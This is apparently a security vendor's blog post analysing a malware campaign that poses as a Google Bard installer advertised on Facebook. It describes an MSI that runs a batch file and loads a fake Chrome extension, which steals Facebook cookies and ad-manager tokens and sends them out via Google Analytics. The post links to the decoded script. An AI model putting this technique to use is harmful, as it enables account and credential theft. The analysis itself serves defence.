Recently, a group of researchers at Nexusguard uncovered a malicious software campaign that disguised itself as a PC-based rendition of ChatGPT, an artificial intelligence ChatBot created by OpenAI utilizing the Generative Pre-trained Transformer (GPT) series of large language models (LLMs).
A similar campaign has since resurfaced on Facebook, this time utilizing Google's Bard AI. Bard is basically an AI Chatbot developed by Google, based on Google's Large language model (LLM), LaMDA, similar to how ChatGPT is based on GPT. These are types of neural networks that mimic the underlying architecture of the brain in the form of a computer.
On June 18, 2023, our team of researchers discovered a Facebook Ad showing an Image of Google Bard. The advertisement was posted by a fake Google AI Facebook page which currently has 233,000 likes and 243,000 followers (Figure 1).
Figure 1 - Fake Google AI Facebook page (hxxps[:]//www[.]facebook[.]com/google.ai.experience)
According to the page transparency feature, the page was created on April 20, 2012 under the old name page Plasma University (Figure 2).
Figure 2 - Page transparency of the Fake Bard AI Facebook page
The Facebook advertisement posted by the Fake Bard AI Facebook page contained a link, which when clicked, redirected visitors to a fake Google Bard website. The website also provided a link to download a file and an access code (Figure 3).
Figure 3 - Fake Google Bard AI website with Download link and Access code
Upon clicking the link, a RAR archive named "Google Ai Setup.rar" was acquired, containing an enclosed MSI installer named "Google Ai Setup.msi".
Figure 4 - Files downloaded from the link in Figure 3
Uploading the downloaded MSI file to VirusTotal revealed that 27 out of 60 security vendors flagged it as malicious (Figure 5).
Figure 5 - VirusTotal scan result
To further understand the malware, our team performed dynamic analysis which involved executing the malware in a virtualized environment (Figure 6).
Figure 6 - Processes spawned during the execution of the malware
Various files were deposited by the malware into “%ProgramFiles(x86)%\Google\Google Ai” on the infected machine, subsequently leading to the execution of cmd.exe with the ensuing parameters: cmd.exe /c ""C:\Program Files (x86)\Google\Google Ai\ggbard.bat""
Upon closer inspection, it was discovered that ggbard.bat comprised a sequence of directives intended to terminate both chrome.exe and chromedriver.exe processes, followed by the execution of Chrome and the loading of the malevolent extension (Figure 7).
Figure 7 - Content of the ggbard.bat
Decoding the Malicious Extension
The goal of the malware was to install a malicious extension on Google Chrome which masqueraded itself as a legitimate Google Translate extension.
Figure 8 - Malicious extension visible on the Google Chrome extension page
Figure 9 - Content of malicious chrome extension
Figure 10 - Content of manifest.json.
Figure 11 - Content of content.js
Figure 12 - Content of background.js
We made an inference that the background.js file contained a malicious payload based on the fact that its code was deliberately obfuscated, implying a deliberate attempt to conceal its true intent.
Obfuscated version: https://pastebin.com/K1yNH0Yh
De-obfuscated version: https://pastebin.com/YecRwVZA
Figure 13 - Decoded background.js
Through our team’s detailed analysis, it was determined that the script was designed to gather Facebook cookies (lines 5-20) and Facebook ad manager access tokens (lines 27-43), which were subsequently transmitted via Google Analytics (lines 1-4).
Figure 14 - Lines that steal Facebook cookies
Figure 15 - Lines that steal Facebook ad manager access token
Figure 16 - Lines that show data exfiltration using Google Analytics
Line 14 reveals the presence of the Google Analytics 'tid' UA-244663376-1, which serves to designate the tracking ID and the property ID of the Google Analytics property where the data will be dispatched. This particular method of exfiltration is employed to bypass traditional Content Security Policy (CSP) mechanisms, and has been utilized in multiple "Magecart" attacks in 2020 for the purpose of stealing credit card information.
Conclusion
In summary, our investigation underscores the manner in which cyber threat actors are utilizing social engineering tactics to exploit the trust that users place in widely-used social networking platforms. It is imperative that users comprehend that a service's apparent legitimacy does not always guarantee its authenticity. Given the increasing sophistication of cybercriminal tactics, it is vital for users to remain vigilant, keep abreast of the latest developments, and take proactive measures to safeguard their personal information and online identity.
Nexusguard not only procures threat intelligence by gathering and scrutinizing data pertaining to the latest malware perils, but also furnishes solutions for web and network application security that can discern and obstruct malware traffic - even those that are aimed at Facebook ads - thereby enabling organizations to maintain a competitive edge and anticipate emerging attack methodologies before they proliferate. To gain unbroken visibility into your cyber risk profile, visit Nexusguard for more information.
Blog Home
